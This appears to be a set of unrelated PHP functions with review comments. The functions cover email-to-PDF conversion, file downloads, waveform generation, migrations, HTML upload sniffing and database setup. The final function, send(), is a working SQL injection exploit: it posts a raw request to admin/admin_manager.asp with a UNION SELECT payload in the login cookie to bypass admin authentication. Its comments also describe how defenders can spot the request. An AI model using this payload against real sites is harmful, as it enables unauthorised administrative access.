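 * NOTE(review): the intermediate file names are joined into a shell command
 * with spaces and no quoting. This is only safe while self::processpart()
 * and self::processparts() return names free of shell metacharacters.
 *
 * @param string $emailsrc  Path of the raw e-mail.
 * @param string $pdfout    Path the PDF is appended to.
 * @param string $coverfile Optional path of a cover document.
 * @return void
 */
public static function processemail($emailsrc, $pdfout, $coverfile = '')
{
    $combfilelist = array();

    # Process the email
    $emailparts = Mail_mimeDecode::decode(array(
        'include_bodies' => true,
        'decode_bodies' => true,
        'decode_headers' => true,
        'input' => file_get_contents($emailsrc),
        'crlf' => "\r\n",
    ));

    # Process the cover if it exists
    if ($coverfile !== '') {
        $combfilelist[] = self::processpart(file_get_contents($coverfile), mime_content_type($coverfile));
    }

    # Process the parts
    $combfilelist = array_merge($combfilelist, self::processparts($emailparts));

    # Create an intermediate file to build the pdf. tempnam() reserves a
    # name that cannot be guessed; a name built from the clock in a shared
    # temp directory can be created in advance by another local user.
    $tmpbase = tempnam(sys_get_temp_dir(), 'e2p-');
    if ($tmpbase === false) {
        foreach ($combfilelist as $combfilename) {
            unlink($combfilename);
        }
        trigger_error('processemail: cannot create a temporary file', E_USER_WARNING);
        return;
    }
    $tmppdffilename = $tmpbase . '.pdf';

    # Build the command to combine all of the intermediate files into one
    $conbcom = str_replace(
        array_merge(array('INTFILE', 'COMBLIST'), array_keys(self::$driver_paths)),
        array_merge(array($tmppdffilename, implode(' ', $combfilelist)), array_values(self::$driver_paths)),
        self::$mime_drivers['gs']
    );
    exec($conbcom);

    # Remove the intermediate files
    foreach ($combfilelist as $combfilename) {
        unlink($combfilename);
    }

    # Write the intermediate file to the final destination
    $intfileres = is_file($tmppdffilename) ? fopen($tmppdffilename, 'rb') : false;
    $outfileres = ($intfileres !== false) ? fopen($pdfout, 'ab') : false;
    if ($intfileres !== false && $outfileres !== false) {
        stream_copy_to_stream($intfileres, $outfileres);
    } else {
        trigger_error('processemail: the combined PDF could not be written', E_USER_WARNING);
    }
    if ($intfileres !== false) {
        fclose($intfileres);
    }
    if ($outfileres !== false) {
        fclose($outfileres);
    }

    # Remove the intermediate file and the name reserved by tempnam()
    if (is_file($tmppdffilename)) {
        unlink($tmppdffilename);
    }
    if (is_file($tmpbase)) {
        unlink($tmpbase);
    }
}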
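/**
 * Send the file of the requested download to the client.
 *
 * Local downloads are sent with readfile(); the others are streamed in
 * 64 KB blocks with a Content-Length header.
 *
 * NOTE(review): the path is OWEB_DIR_DATA/downloads/ plus whatever
 * getUrl() returns. If that value can contain "..", the file may lie
 * outside the downloads directory; confirm it is validated when stored.
 *
 * @return void
 * @throws \Model\downloads\exception\DownloadCantBeFind When no numeric id
 *         is given or the file cannot be opened.
 */
public function dwld()
{
    $this->min();

    if (!is_numeric($this->getParam("id"))) {
        throw new \Model\downloads\exception\DownloadCantBeFind("No Download ID given");
    }

    $this->download->newDownload();
    $isLocal = $this->download->getIsLocal();
    $url = OWEB_DIR_DATA . "/downloads/" . $this->download->getUrl();

    if ($isLocal) {
        // Checked before any header is sent, so a missing file is reported
        // instead of being delivered as an empty attachment.
        if (!is_file($url)) {
            throw new \Model\downloads\exception\DownloadCantBeFind("Download file is missing");
        }
        header('Content-Description: File Transfer');
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="' . basename($url) . '";');
        readfile($url);
        return;
    }

    $fp = fopen($url, "r");
    if ($fp === false) {
        throw new \Model\downloads\exception\DownloadCantBeFind("Download file is missing");
    }

    header("Content-Disposition: attachment; filename=" . basename($url));
    // header() replaces an earlier header of the same name, so of the three
    // Content-Type values that were set here only the last one was sent.
    header("Content-Type: application/download");
    header("Content-Description: File Transfer");
    $length = filesize($url);
    if ($length !== false) {
        header("Content-Length: " . $length);
    }
    flush(); // this doesn't really matter.

    while (!feof($fp)) {
        $block = fread($fp, 65536);
        if ($block === false) {
            break;
        }
        echo $block;
        flush(); // this is essential for large downloads
    }
    fclose($fp);
}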
/**
 * _read
 *
 * Reads from $this->_handle. The sign of $bytes is ignored; a length of
 * zero reads nothing.
 *
 * @param int $bytes Bytes to read
 *
 * @access private
 * @return mixed Result of fread(), or null when the length is zero
 */
function _read($bytes = 1)
{
    $bytes = abs($bytes);

    if ($bytes > 0) {
        return fread($this->_handle, $bytes);
    }

    return null;
}
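/**
 * Build waveform peaks for an audio file.
 *
 * ffmpeg converts the file to mono unsigned 8-bit PCM at 11025 Hz in a
 * temporary file. That file is read in self::PEAKS_RESOLUTION chunks and
 * the highest sample of each chunk, minus 127, is yielded.
 *
 * Both file names go through escapeshellarg() before they enter the
 * command line.
 *
 * NOTE(review): the temporary file is deleted right after withOpenedFile()
 * returns. If that helper hands back the generator without consuming it,
 * the file is gone before it is read - confirm against the helper.
 *
 * @param string $file_name Path of the audio file.
 * @return array Whatever withOpenedFile() returns for the peak generator.
 * @throws ApplicationException When ffmpeg produced no output file.
 */
public static function generate($file_name)
{
    set_time_limit(0);

    $temp_file = TempFileProvider::generate("peaks", ".raw");
    $command = sprintf(
        "%s -v quiet -i %s -ac 1 -f u8 -ar 11025 -acodec pcm_u8 %s",
        self::$ffmpeg_cmd,
        escapeshellarg($file_name),
        escapeshellarg($temp_file)
    );
    shell_exec($command);

    if (!file_exists($temp_file)) {
        throw new ApplicationException("Waveform could not be generated!");
    }

    // fread() needs a positive integer; ceil() returns a float and an empty
    // file would give 0.
    $chunk_size = max(1, (int) ceil(filesize($temp_file) / self::PEAKS_RESOLUTION));

    $peaks = withOpenedFile($temp_file, "r", function ($fh) use ($chunk_size) {
        while (!feof($fh)) {
            $data = fread($fh, $chunk_size);
            // Explicit checks: a chunk that is exactly the string "0" is
            // falsy and used to end the loop early.
            if ($data === false || $data === '') {
                break;
            }

            $peak = 0;
            foreach (str_split($data) as $item) {
                $code = ord($item);
                if ($code > $peak) {
                    $peak = $code;
                }
                if ($code == 255) {
                    break; // cannot get any higher
                }
            }

            yield $peak - 127;
        }
    });

    TempFileProvider::delete($temp_file);

    return $peaks;
}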
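/**
 * Task to run pending migrations
 *
 * When the migration table is not installed yet, the SQL file for the
 * configured database platform is executed first.
 *
 * @param array $params Task options; 'db' and 'step' are read here.
 * @return null
 * @throws \RuntimeException When the platform SQL file cannot be read.
 */
protected function _execute(array $params)
{
    $migrations = new MigrationManager();

    Database::$default = $params['db'];
    $this->db = Database::instance();
    $db_config = Kohana::$config->load('database')->{$params['db']};

    if (!ORM::factory('Migration')->is_installed()) {
        /**
         * Get platform from database config
         */
        $platform = strtolower($db_config['type']);
        if ('mysqli' == $platform) {
            $platform = 'mysql';
        }

        /**
         * Get SQL from file for selected platform
         */
        $file = realpath(substr(__DIR__, 0, strlen(__DIR__) - strlen('classes/Task/Db')) . 'sql/' . $platform . '.sql');

        // realpath() returns false for a platform without an SQL file; the
        // false value used to be passed on to fopen() and the query.
        $sql_create = ($file === false) ? false : file_get_contents($file);
        if ($sql_create === false) {
            throw new \RuntimeException('No migration table SQL available for platform ' . $platform);
        }

        $this->db->query(0, $sql_create);

        $msg = Minion_CLI::color("-----------------------------\n", 'green');
        $msg .= Minion_CLI::color("| Migration table create!!! |\n", 'green');
        $msg .= Minion_CLI::color("-----------------------------\n", 'green');
        Minion_CLI::write($msg);
    }

    $migrations->migrate($params['db'], $params['step']);
}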
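/**
 * Detect HTML in the first KB to prevent against potential security issue with
 * IE/Safari/Opera file type auto detection bug.
 * Returns true if file contain insecure HTML code at the beginning.
 *
 * This is a heuristic over the first 1024 bytes only; markup that starts
 * later in the file is not seen.
 *
 * NOTE(review): a file that cannot be opened yields false, the same answer
 * as "no HTML found". A caller that uses this as an upload gate should
 * reject unreadable files on its own.
 *
 * @param string $filePath absolute path to file
 * @return boolean
 */
function DetectHtml($filePath)
{
    $fp = fopen($filePath, 'rb');
    if ($fp === false) {
        // false used to be passed on to fread() and fclose()
        return false;
    }
    $chunk = fread($fp, 1024);
    fclose($fp);

    $chunk = strtolower((string) $chunk);
    if (!$chunk) {
        return false;
    }
    $chunk = trim($chunk);

    if (preg_match("/<!DOCTYPE\\W*X?HTML/sim", $chunk)) {
        return true;
    }

    $tags = array('<body', '<head', '<html', '<img', '<pre', '<script', '<table', '<title');
    foreach ($tags as $tag) {
        if (false !== strpos($chunk, $tag)) {
            return true;
        }
    }

    $patterns = array(
        //type = javascript
        '!type\\s*=\\s*[\'"]?\\s*(?:\\w*/)?(?:ecma|java)!sim',
        //href = javascript
        //src = javascript
        //data = javascript
        '!(?:href|src|data)\\s*=\\s*[\'"]?\\s*(?:ecma|java)script:!sim',
        //url(javascript
        '!url\\s*\\(\\s*[\'"]?\\s*(?:ecma|java)script:!sim',
    );
    foreach ($patterns as $pattern) {
        if (preg_match($pattern, $chunk)) {
            return true;
        }
    }

    return false;
}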
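/**
 * Run the statements of plugins/avmaker/sql/basic.sql and print one table
 * row per statement with its result.
 *
 * The CPG_ placeholder is replaced by the configured table prefix. With
 * $stop set, a form posting back to the current URL is printed afterwards.
 *
 * NOTE(review): mysql_query() belongs to the ext/mysql API, which was
 * removed in PHP 7. It is left in place because this function does not
 * show which database wrapper the application provides.
 *
 * @param bool $stop Whether to print the "Go!" form after the table.
 * @return void
 */
function avmaker_configure($stop = true)
{
    global $errors, $CONFIG;

    require 'include/sql_parse.php';

    $db_update = 'plugins/avmaker/sql/basic.sql';

    // file_get_contents() leaves no handle open, unlike fread(fopen(...))
    $sql_query = file_get_contents($db_update);
    if ($sql_query === false) {
        $sql_query = '';
    }

    // Update table prefix (literal replacement, no regex back-references)
    $sql_query = str_replace('CPG_', $CONFIG['TABLE_PREFIX'], $sql_query);
    $sql_query = remove_remarks($sql_query);
    $sql_query = split_sql_file($sql_query, ';');

    // The heading used to be closed with a second opening tag
    echo '<h2>Performing Database Updates</h2>';
    echo '<table class="maintable">';

    foreach ($sql_query as $q) {
        // The statement is shown as text, so it is escaped for HTML
        $q_html = htmlspecialchars($q, ENT_QUOTES);
        echo "<tr><td class='debug_text' style='color: black;'>\r\n\t\t{$q_html}\r\n\t\t</td>";
        if (mysql_query($q)) {
            echo "<td class='debug_text' style='color: green;'>OK</td></tr>";
        } else {
            echo "<td class='debug_text' style='color: black;'>Already Done</td></tr>";
        }
    }
    echo "</table>";

    if ($stop) {
        // REQUEST_URI is controlled by the client; unescaped it could close
        // the attribute and add markup to the page.
        $action = htmlspecialchars($_SERVER['REQUEST_URI'], ENT_QUOTES);
        echo '<form action="' . $action . '" method="post">' . "\n";
        echo '<input type="submit" value="Go!" name="submit" />' . "\n";
        echo '</form>' . "\n";
    }
}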
/**
 * Build a raw HTTP/1.1 POST for admin/admin_manager.asp?action=add, send it
 * to port 80 of the global $host and return the response.
 *
 * Both the request and the response are echoed. The Cookie header carries
 * URL-encoded SQL keywords inside the m_username value, which only has an
 * effect on a server that builds a query from that cookie by string
 * concatenation.
 *
 * For defenders: cookie values are request data like any other and belong
 * in bound parameters. In logs this request shows up as a POST to the path
 * above with "union" and "select" inside a Cookie header and the fixed
 * User-Agent and X-Forwarded-For values set below.
 *
 * @param string $cmd Request body; its length becomes Content-Length.
 * @return string Raw response read from the socket.
 */
function send($cmd)
{
    global $host, $path;
    $message = "POST " . $path . "admin/admin_manager.asp?action=add HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Referer: http://{$host}{$path}\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: securitylab\r\n";
    $message .= "X-Forwarded-For:1.1.1.1\r\n";
    $message .= "Host: {$host}\r\n";
    $message .= "Content-Length: " . strlen($cmd) . "\r\n";
    // The same encoded fragment appears as the m_username value and as part
    // of the name of the third cookie.
    $message .= "Cookie: m_username=securitylab'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin; m_level=0; checksecuritylab'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin=cf144fd7a325d1088456838f524ae9d7\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $message .= $cmd;
    echo $message;
    // The fsockopen() result is used by fputs() before it is tested, and
    // the socket is never closed in this function.
    $fp = fsockopen($host, 80);
    fputs($fp, $message);
    $resp = '';
    while ($fp && !feof($fp)) {
        $resp .= fread($fp, 1024);
    }
    echo $resp;
    return $resp;
}